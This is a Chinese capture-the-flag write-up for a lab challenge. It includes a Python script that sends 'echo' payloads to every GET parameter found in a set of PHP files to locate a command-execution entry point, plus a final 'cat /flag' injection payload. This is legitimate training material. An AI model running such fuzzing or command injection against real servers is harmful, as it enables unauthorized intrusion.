本文为记录个人信安小白的刷题路程,大佬勿喷,也同时希望文章能对您有所帮助
打开靶机,发现已经把源码给我们了,直接通过URL下载,
打开文件发现有很多php文件,不知道哪个是我们要找的,其他地方也没有提示,
随便打开几个文件,
发现有很多GET,POST传参,而且有些传参参与system,eval等命令函数,
一个一个试太麻烦,我们需要编写代码帮我们筛选,
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
| import requests
import os
import re
url = 'http://36d3d08f-a863-4ceb-a6cf-a1a5cbffbf98.node5.buuoj.cn:81/'
path = 'D:\下载\www\src'
ptn_get = re.compile(br"\$_GET\['(\w+)'\]")
ptn_res = re.compile(br'success_hack')
for f in os.scandir(path):
if not f.is_file() or not f.name.endswith('.php'):
continue
print(f"扫描文件: {f.name}")
try:
with open(f.path, 'rb') as fp:
data = fp.read()
except:
print(f"无法读取文件: {f.name}")
continue
get_params = set(ptn_get.findall(data))
for param in get_params:
param_name = param.decode('ascii')
cmd = 'echo "success_hack";'
try:
r = requests.get(url + f.name, params={param_name: cmd}, timeout=10)
if ptn_res.search(r.content):
print(f"发现漏洞! 文件: {f.name}, 参数: {param_name}")
exit()
except requests.Timeout:
print(f"请求超时: {f.name}?{param_name}=...")
continue
except requests.RequestException as e:
print(f"请求失败: {f.name} - {e}")
continue
except Exception as e:
print(f"发生错误: {e}")
continue
print("扫描完成,未发现漏洞")
|
筛选过程要很久,最终发现,
payload:
1
| /xk0SzyKwfzw.php?Efa5BVG=cat /flag
|
是命令入口,
获得flag
